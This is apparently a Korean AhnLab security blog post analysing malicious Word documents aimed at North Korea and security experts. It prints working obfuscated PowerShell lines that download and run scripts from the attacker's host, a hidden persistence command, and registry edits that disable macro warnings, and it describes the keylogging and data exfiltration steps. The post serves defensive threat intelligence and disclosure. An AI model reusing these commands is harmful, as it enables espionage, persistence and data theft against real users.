대북 관련 특정인을 타겟으로 하는 악성 워드 문서

ASEC 분석팀은 안보 및 대북 관련 특정인을 타겟으로 하는 악성 워드 문서가 지속적으로 유포되고 있음을 확인하였다. 유포가 확인된 워드 문서의 파일명에는 대북 관련 인물의 이름이 포함된 경우가 다수 존재하여 해당 분야를 타겟으로 공격이 이루어지는 것으로 추정된다. 최근 확인된 워드 문서의 파일명은 다음과 같다.

날짜파일명
7/18(작성양식)2022년 광복절 경축사 전문가 사전 의견수렴.doc
7/200511_통일부 *** 부장 회의록.doc
8/1Asan Symposium 2022.doc
8/3질문지(현** 연구위원님).doc
8/4질문지(안** 총장님).doc
8/11(기획)세션6. 경기도 “평화와 통일을 위한 사회적 대화” 추진방안.doc
8/16질문지(정** 박사님).doc
8/17한반도 안보와 대북전략 토론(김**).doc
확인된 파일명

워드 문서에는 악성 VBA 매크로가 포함되어 있으며 해당 유형은 안랩 TIP에 공개된 <2021년 Kimsuky 공격 워드(word) 문서 사례 총 정리 분석 보고서> 에서 확인된 B 유형과 동일하다. 전체적인 동작 방식은 다음 그림과 같다.

그림1. 동작 과정

가장 최근에 확인된 ‘한반도 안보와 대북전략 토론(김**).doc’ 에서 확인된 매크로 코드는 다음과 같다.

그림2. 확인된 매크로 코드

이전 ‘워드문서를 이용한 특정인 대상 APT 공격시도‘ 게시글에서 확인된 매크로 코드보다 조금 더 난독화되어 있다. 매크로 실행 시 파워쉘을 통해  ‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’ 에서 추가 스크립트를 다운로드한다.

[string]$f={(Nwraew-Objwraect Newrat.WebwraCliwraewrant).Doweilsdjfeng(‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’)};$j=$f.Replace(‘wra’,”);$u=$j.Replace(‘eilsdjfe’,’nloadstri’);$x=iex $u;iex $x
실행되는 파워쉘 명령어
그림3. hxxp://vjdif.mypressonline[.]com/ho/ng.txt에서 확인된 스크립트

해당 스크립트는 다음 명령어를 통해 사용자 PC 정보를 수집하여 %APPDATA%\Ahnalb\Ahnlab.hwp에 저장하며 해당 파일의 내용을 인코딩하여 hxxp://vjdif.mypressonline[.]com/ho/post.php에 전송한다.

실행 명령어수집 정보
GetFolderPath(“Recent”)최근 폴더 경로
dir $env:ProgramFilesProgramFiles 폴더 내용
dir “C:\Program Files (x86)C:\Program Files (x86) 폴더 내용
systeminfo시스템 정보
tasklist실행중인 프로세스 목록
수집 정보

이때 HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 에 AhnlabUpdate명의 레지스트리가 존재하면 정보 수집은 수행하지 않고 바로 로그 파일을 전송한다. 이는 이후 키로깅 시에도 동일한 로그 파일명(Ahnlab.hwp)을 사용하기 때문에 해당 키로깅 데이터를 수집하기 위함으로 보인다.

데이터 전송 이후에는 hxxp://vjdif.mypressonline.com/ho/ng.down 에 접속하여 인코딩된 추가 스크립트를 다운로드 및 실행한다.

그림4. 생성된 파일

추가로 다운로드한 ng.down 파일은 인코딩되어 있으며 Start-Job 명령어를 통해 PowerShell 백그라운드 작업으로 실행된다. 해당 스크립트의 기능은 다음과 같다.

  • 바로가기 생성

파워쉘 명령어가 저장된 C:\windows\temp 폴더에 HncSerial.log 파일을 생성한다. 또한 악성 코드가 지속적으로 동작할 수 있도록 해당 파일에 대해 Startup 폴더에 바로가기를 생성한다.

[string]$a = {(New-Object Net.WebClient).Dokarysuntring(‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’)};$b=$a.replace(‘karysun’,’wnloadS’);$c=iex $b;iex $c
HncSerial.log 파일 내용

바로가기를 통해 실행되는 파워쉘 명령어는 다음과 같다.

powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText(‘C:\windows\temp\HncSerial.log’);iex $x}
실행 명령어
그림5. 생성된 바로가기 파일
  • 오피스 보안 설정 변경

레지스트리 값 변경을 통해 매크로가 항상 실행 될 수 있도록 오피스 보안설정을 수정한다.

New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\14.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\15.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\16.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\17.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\18.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\19.0\Word\Security -Name VBAWarnings -Value 1
레지스트리 변경 명령어
  • 키로깅

사용자의 키 입력을 %APPDATA%\Ahnalb\Ahnlab.hwp 에 기록한다. 기록된 내용은 사용자가 PC 시작 시 앞서 생성한 바로가기 파일이 실행되어 hxxp://vjdif.mypressonline[.]com/ho/ng.txt 에 접속하여 해당 페이지에 존재하는 파워쉘 명령어가 실행되어 hxxp://vjdif.mypressonline[.]com/ho/post.php에 전송한다.

그림6. 키로깅 관련 코드

대북 관련 인사를 대상으로 하는 워드 문서는 과거부터 꾸준히 확인되고 있어 각별한 주의가 필요하다. 발신자를 알 수 없는 메일의 첨부파일이나 출처를 알 수 없는 파일의 실행을 자제해야 한다. 또한, 워드 문서에 포함된 악성 매크로가 자동으로 실행되지 않도록 적절한 보안 설정을 유지해야한다.

[파일 진단]
Downloader/DOC.Kimsuky
Trojan/PowerShell.FileUpload

[IOC]
6f9c20f8f7f28a732b0853929a06b79c (VBA)
hxxp://vjdif.mypressonline[.]com/ho/ng.txt
hxxp://vjdif.mypressonline[.]com/ho/ng.down
hxxp://vjdif.mypressonline[.]com/ho/post.php

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:,

5 1 vote
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments